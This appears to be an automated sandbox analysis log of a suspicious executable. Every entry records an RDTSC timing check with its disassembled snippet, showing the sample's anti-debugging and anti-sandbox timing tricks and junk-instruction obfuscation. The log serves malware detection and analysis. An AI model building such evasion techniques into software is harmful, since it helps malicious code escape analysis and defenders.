                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D177AF second address: D177B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D177B8 second address: D177BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D177BC second address: D177C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D177C0 second address: D177D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jns 00007F0EC4CB7FC6h 0x0000000f js 00007F0EC4CB7FC6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D17950 second address: D17971 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0EC450202Bh 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D17971 second address: D17989 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC4CB7FD4h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D17C64 second address: D17C70 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0EC450201Eh 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D17DEA second address: D17DF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D17DF1 second address: D17DF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D17F5A second address: D17F68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0EC4CB7FCAh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D17F68 second address: D17F9E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC4502025h 0x00000007 jmp 00007F0EC450201Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jg 00007F0EC4502022h 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D17F9E second address: D17FA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D17FA4 second address: D17FA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D17FA8 second address: D17FBD instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0EC4CB7FC6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D17FBD second address: D17FD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F0EC450201Eh 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D17FD0 second address: D17FEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0EC4CB7FD9h 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D17FEF second address: D17FFF instructions: 0x00000000 rdtsc 0x00000002 je 00007F0EC4502016h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D183A9 second address: D183AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D183AD second address: D183BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jnc 00007F0EC4502016h 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D186A6 second address: D186B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F0EC4CB7FC6h 0x0000000a jnp 00007F0EC4CB7FD2h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D186B8 second address: D186C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F0EC4502016h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D186C2 second address: D186E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0EC4CB7FCCh 0x00000009 jmp 00007F0EC4CB7FD2h 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D186E4 second address: D18708 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F0EC4502021h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F0EC450201Ah 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D18708 second address: D18713 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ecx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D18713 second address: D18724 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0EC450201Bh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D18724 second address: D1872D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D1039A second address: D103AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 jbe 00007F0EC450201Ah 0x0000000d push edx 0x0000000e pop edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D103AB second address: D103B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jnp 00007F0EC4CB7FC6h 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D18879 second address: D18888 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 jbe 00007F0EC4502016h 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D18888 second address: D1888E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D1888E second address: D1889B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0EC4502018h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D1889B second address: D188A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D18F7E second address: D18F89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F0EC4502016h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D18F89 second address: D18F8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D18F8F second address: D18FA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0EC450201Dh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D18FA5 second address: D18FAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D18FAB second address: D18FAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D19592 second address: D19598 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D19598 second address: D195A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D195A1 second address: D195B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0EC4CB7FD3h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D195B8 second address: D195BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D195BC second address: D195C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D1C5A1 second address: D1C5A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D20458 second address: D2045C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D2045C second address: D2046A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007F0EC4502016h 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: CDE720 second address: CDE751 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F0EC4CB7FD1h 0x00000008 pop edi 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push esi 0x00000013 pop esi 0x00000014 jmp 00007F0EC4CB7FCCh 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: CDE751 second address: CDE755 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: CDE755 second address: CDE76F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC4CB7FD6h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: CDE76F second address: CDE775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: CDE775 second address: CDE780 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F0EC4CB7FC6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: CEA29D second address: CEA2BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC4502027h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: CEA2BE second address: CEA2C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D2398A second address: D2398E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D2398E second address: D23994 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D23994 second address: D2399A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D2399A second address: D239C8 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0EC4CB7FCEh 0x00000008 push edx 0x00000009 pop edx 0x0000000a jno 00007F0EC4CB7FC6h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jne 00007F0EC4CB7FDAh 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D23C8F second address: D23C99 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0EC450201Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D23C99 second address: D23CA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D240A8 second address: D240AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D240AC second address: D240B6 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0EC4CB7FC6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D240B6 second address: D240C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D240C0 second address: D240C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D240C4 second address: D240C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D240C8 second address: D240CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D24268 second address: D24272 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0EC4502016h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D24272 second address: D2427C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D26BB8 second address: D26BCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0EC450201Eh 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D26BCE second address: D26C03 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0EC4CB7FC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b xor dword ptr [esp], 6A76A752h 0x00000012 xor dword ptr [ebp+122D2BAFh], ecx 0x00000018 push B8629CEAh 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F0EC4CB7FD6h 0x00000024 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D278E1 second address: D278E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D279D9 second address: D279E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F0EC4CB7FC6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D2814D second address: D28152 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D28152 second address: D28158 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D28158 second address: D281C4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007F0EC4502018h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 00000016h 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 xor edi, 6CE2FD32h 0x00000029 mov edi, ebx 0x0000002b push 00000000h 0x0000002d add si, 1563h 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push ecx 0x00000037 call 00007F0EC4502018h 0x0000003c pop ecx 0x0000003d mov dword ptr [esp+04h], ecx 0x00000041 add dword ptr [esp+04h], 0000001Bh 0x00000049 inc ecx 0x0000004a push ecx 0x0000004b ret 0x0000004c pop ecx 0x0000004d ret 0x0000004e jnp 00007F0EC450201Ch 0x00000054 mov dword ptr [ebp+122D1FF6h], edi 0x0000005a push eax 0x0000005b push edx 0x0000005c push edx 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D2B054 second address: D2B058 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D2AD32 second address: D2AD5C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F0EC4502016h 0x00000009 jmp 00007F0EC4502027h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push ebx 0x00000013 pushad 0x00000014 push esi 0x00000015 pop esi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D2BA50 second address: D2BA64 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC4CB7FD0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D2BA64 second address: D2BA6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D2CF7E second address: D2CF82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D2FFCB second address: D2FFD0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D2FFD0 second address: D30050 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F0EC4CB7FD5h 0x0000000f nop 0x00000010 xor di, C293h 0x00000015 push 00000000h 0x00000017 mov ebx, dword ptr [ebp+122D3279h] 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push ebp 0x00000022 call 00007F0EC4CB7FC8h 0x00000027 pop ebp 0x00000028 mov dword ptr [esp+04h], ebp 0x0000002c add dword ptr [esp+04h], 0000001Ah 0x00000034 inc ebp 0x00000035 push ebp 0x00000036 ret 0x00000037 pop ebp 0x00000038 ret 0x00000039 mov ebx, dword ptr [ebp+122D3236h] 0x0000003f mov dword ptr [ebp+122D331Bh], ebx 0x00000045 call 00007F0EC4CB7FD7h 0x0000004a sub bx, FF0Ah 0x0000004f pop edi 0x00000050 push eax 0x00000051 push ebx 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D30050 second address: D30054 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D31044 second address: D31051 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0EC4CB7FC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D31051 second address: D310CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 jbe 00007F0EC450202Ch 0x0000000d jmp 00007F0EC4502026h 0x00000012 nop 0x00000013 jmp 00007F0EC4502029h 0x00000018 push 00000000h 0x0000001a call 00007F0EC450201Ah 0x0000001f xor di, 198Bh 0x00000024 pop edi 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push ebx 0x0000002a call 00007F0EC4502018h 0x0000002f pop ebx 0x00000030 mov dword ptr [esp+04h], ebx 0x00000034 add dword ptr [esp+04h], 00000015h 0x0000003c inc ebx 0x0000003d push ebx 0x0000003e ret 0x0000003f pop ebx 0x00000040 ret 0x00000041 movzx ebx, di 0x00000044 or edi, 3991A2C2h 0x0000004a xchg eax, esi 0x0000004b pushad 0x0000004c pushad 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D310CD second address: D310D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D310D3 second address: D310E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jns 00007F0EC4502018h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D310E8 second address: D310EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D310EC second address: D310FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC450201Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D30265 second address: D30269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D30269 second address: D30285 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0EC4502016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0EC450201Eh 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D31305 second address: D31309 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D31309 second address: D31313 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0EC4502016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
